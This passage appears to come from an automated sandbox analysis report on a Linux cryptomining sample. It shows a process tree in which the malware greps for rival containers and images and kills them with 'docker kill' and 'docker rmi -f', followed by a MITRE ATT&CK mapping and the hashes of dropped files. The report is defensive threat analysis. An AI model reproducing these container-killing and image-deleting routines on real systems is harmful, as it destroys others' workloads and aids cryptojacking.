  xargs -I "%" docker kill "%"
  2⤵
  PID:3039
- /bin/grep
  grep pocosow
  2⤵
  PID:3037
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  - Attempts to change immutable files
  PID:3043
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3042
- /bin/grep
  grep gakeaws
  2⤵
  PID:3041
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  PID:3047
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3046
- /bin/grep
  grep azulu
  2⤵
  PID:3045
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  - Attempts to change immutable files
  PID:3051
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3050
- /bin/grep
  grep auto
  2⤵
  PID:3049
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  PID:3055
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3054
- /bin/grep
  grep xmr
  2⤵
  PID:3053
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  - Attempts to change immutable files
  PID:3059
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3058
- /bin/grep
  grep mine
  2⤵
  PID:3057
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  PID:3063
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3062
- /bin/grep
  grep slowhttp
  2⤵
  PID:3061
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  - Attempts to change immutable files
  PID:3067
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3066
- /bin/grep
  grep bash.shell
  2⤵
  PID:3065
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  PID:3071
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3070
- /bin/grep
  grep entrypoint.sh
  2⤵
  PID:3069
- /usr/bin/xargs
  xargs -I "%" docker kill "%"
  2⤵
  PID:3075
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3074
- /bin/grep
  grep /var/sbin/bash
  2⤵
  PID:3073
- /usr/bin/xargs
  xargs -I "%" docker rmi -f "%"
  2⤵
  PID:3079
- /usr/bin/awk
  awk "{print \$3}"
  2⤵
  PID:3078
- /bin/grep
  grep pocosow
  2⤵
  PID:3077
- /usr/bin/xargs
  xargs -I "%" docker rmi -f "%"
  2⤵
  - Attempts to change immutable files
  PID:3083
- /usr/bin/awk
  awk "{print \$3}"
  2⤵
  PID:3082
- /bin/grep
  grep gakeaws
  2⤵
  PID:3081
- /usr/bin/xargs
  xargs -I "%" docker rmi -f "%"
  2⤵
  PID:3087
- /usr/bin/awk
  awk "{print \$3}"
  2⤵
  PID:3086
- /bin/grep
  grep buster-slim
  2⤵
  PID:3085

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:1776

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
PID:1775

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:1888

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
PID:1887

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/kdevtmpfsi

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/usr/bin/tntrecht

Filesize
14KB

MD5
726a7b7afb4b78ea6702e4b9f7128723

SHA1
c836f6e3ac628023880394ab1028712c275f41a8

SHA256
8a9588a23487c1f61ae5fd032bc8f83f11d9781b206d2d7d230b29705bb84eb2

SHA512
fde0fcd807c0645a7ad9a3f49d945b67c897c54c4d3b6072d1a1d0d12d5c906b3d1a7ebc324ee7716d5c65e03b8cbf3698b229de4c3b57b91fdab07eba2ee9ea

Download Submit